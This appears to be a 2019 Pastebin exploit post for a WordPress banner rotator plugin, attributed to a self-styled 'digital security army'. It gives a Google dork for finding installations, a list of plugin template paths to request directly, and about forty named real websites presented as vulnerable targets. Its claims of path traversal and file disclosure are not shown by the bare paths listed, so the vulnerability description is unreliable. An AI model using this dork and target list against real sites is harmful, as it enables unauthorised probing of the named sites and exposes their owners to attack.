Advertisement
KingSkrupellos

WordPress all_in_one_bannerRotator Plugins 4.9.9 Exploit

Jan 14th, 2019
154
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.70 KB | None | 0 0
  1. ###############################################################################
  2.  
  3. # Exploit Title : WordPress all_in_one_bannerRotator Plugins 4.9.9 File Information Exposure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 14/01/2019
  7. # Vendor Homepage : lambertgroupproductions.com ~ responsivejqueryslider.com
  8. # Software Download Link : downloads.wordpress.org/plugin/all-in-one-slider.zip
  9. # Software Information Links : responsivejqueryslider.com/banner_rotator.html
  10. + responsivejqueryslider.com/wordpressplugin/banner_rotator_responsive.html
  11. + codecanyon.net/item/all-in-one-slider-responsive-jquery-slider-plugin/1534434?ref=LambertGroup
  12. + lambertgroupproductions.com/portfolio_page/one-slider-responsive-jquery-slider-plugin/
  13. # Software Price : 11$
  14. # Tested On : Windows and Linux
  15. # Category : WebApps
  16. # Affected Versions : 1.1 - 3. 0 - 3.2 - 3.5.0 - 4.7.12 - 4.9.9
  17. # Exploit Risk : High
  18. # Google Dorks : inurl:"/wp-content/plugins/all_in_one_bannerRotator/"
  19. # Vulnerability Type : CWE-200 [ Information Exposure ]
  20. CWE-538 [ File and Directory Information Exposure ]
  21. CWE-22 [ Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ]
  22.  
  23. ###############################################################################
  24.  
  25. # Impact :
  26. ***********
  27.  
  28. * WordPress all_in_one_bannerRotator Plugins 4.9.9 and other versions is prone to an arbitrary file disclosure
  29.  
  30. vulnerability because it fails to properly sanitize user-supplied input.
  31.  
  32. * An attacker can exploit this vulnerability to view local files in the context of the web server process,
  33.  
  34. which may aid in launching further attacks.
  35.  
  36. * An information exposure is the intentional or unintentional disclosure
  37.  
  38. of information to an actor that is not explicitly authorized to have access to that information.
  39.  
  40. * The product stores sensitive information in files or directories that are accessible
  41.  
  42. to actors outside of the intended control sphere.
  43.  
  44. * The software uses external input to construct a pathname that is intended to identify a file or
  45.  
  46. directory that is located underneath a restricted parent directory, but the software does not
  47.  
  48. properly neutralize special elements within the pathname that can cause the pathname
  49.  
  50. to resolve to a location that is outside of the restricted directory.
  51.  
  52. ###############################################################################
  53.  
  54. # Video Tutorials =>
  55. *******************
  56.  
  57. Step 1: Installation – youtube.com/watch?v=D8rQdXzEz0o
  58. Step 2: Manage Images – youtube.com/watch?v=ULrPCuP0rnQ
  59. Step 3: Manage Text Over Image – youtube.com/watch?v=4KqgWBmx8RA
  60. Step 4: Manage Multiple Banners – youtube.com/watch?v=y2wnD3hUdus
  61.  
  62. ###############################################################################
  63.  
  64. # Exploit :
  65. *************
  66.  
  67. /wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  68.  
  69. /wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php?page=all_in_one_bannerRotator_Manage_Banners
  70.  
  71. /wp-content/plugins/all_in_one_bannerRotator/tpl/add_playlist_record.php
  72.  
  73. /wp-content/plugins/all_in_one_bannerRotator/tpl/banners.php
  74.  
  75. /wp-content/plugins/all_in_one_bannerRotator/tpl/help.php
  76.  
  77. /wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php
  78.  
  79. /wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php?page=all_in_one_bannerRotator_Add_New
  80.  
  81. /wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php?page=all_in_one_bannerRotator_Manage_Banners
  82.  
  83. /wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php?page=all_in_one_bannerRotator_Help
  84.  
  85. /wp-content/plugins/all_in_one_bannerRotator/tpl/playlist.php
  86.  
  87. /wp-content/plugins/all_in_one_bannerRotator/tpl/add_playlist_record.php?page=all_in_one_bannerRotator_Playlist
  88.  
  89. /wp-content/plugins/all_in_one_bannerRotator/tpl/playlist_elements_over_image.php
  90.  
  91. /wp-content/plugins/all_in_one_bannerRotator/tpl/preview.html
  92.  
  93. /wp-content/plugins/all_in_one_bannerRotator/tpl/settings_form.php
  94.  
  95. ###############################################################################
  96.  
  97. # Example Vulnerable Sites :
  98. ****************************
  99.  
  100. [+] amf-lebanon.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_playlist_record.php
  101.  
  102. [+] hotel-le-verseau.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  103.  
  104. [+] wolfetours.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  105.  
  106. [+] sklawfirm.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  107.  
  108. [+] ecolestetiennedeseaux.fr/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  109.  
  110. [+] warrentonfamilydentistry.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  111.  
  112. [+] icaran.cl/headhunters/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  113.  
  114. [+] oha.net.au/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  115.  
  116. [+] neostrata.ie/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  117.  
  118. [+] dash.gr/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  119.  
  120. [+] mydebtadvisors.com/dev/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  121.  
  122. [+] downtoearthlawn.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  123.  
  124. [+] marketingdepartmentinc.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  125.  
  126. [+] veepraces.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  127.  
  128. [+] mvucc.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  129.  
  130. [+] thebutlerschool.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  131.  
  132. [+] mckannafabs.com.au/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  133.  
  134. [+] susanelanjones.co.uk/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  135.  
  136. [+] animalrepro.com/wp-content/plugins/all_in_one_bannerRotator//tpl/add_banner.php
  137.  
  138. [+] carh.org/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  139.  
  140. [+] orsrents.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  141.  
  142. [+] trechomes.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  143.  
  144. [+] primepowdercoating.com.au/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  145.  
  146. [+] baystateconsultants.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  147.  
  148. [+] cardiff-lift.co.uk/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  149.  
  150. [+] triplesservices.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  151.  
  152. [+] homeleisure.com.au/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  153.  
  154. [+] perryverroneroofing.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  155.  
  156. [+] emmaswebsite.com.au/esh/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  157.  
  158. [+] viatorians.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  159.  
  160. [+] avantec.se/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  161.  
  162. [+] bodycorpservices.co.nz/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  163.  
  164. [+] ultrafin.co.za/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  165.  
  166. [+] smartindia.co.in/influx/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  167.  
  168. [+] lejagroup.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  169.  
  170. [+] vibrantjersey.je/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  171.  
  172. [+] casadovelhodragoeiro.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  173.  
  174. [+] triplesservices.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  175.  
  176. [+] pegasostravel.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  177.  
  178. ###############################################################################
  179.  
  180. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  181.  
  182. #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement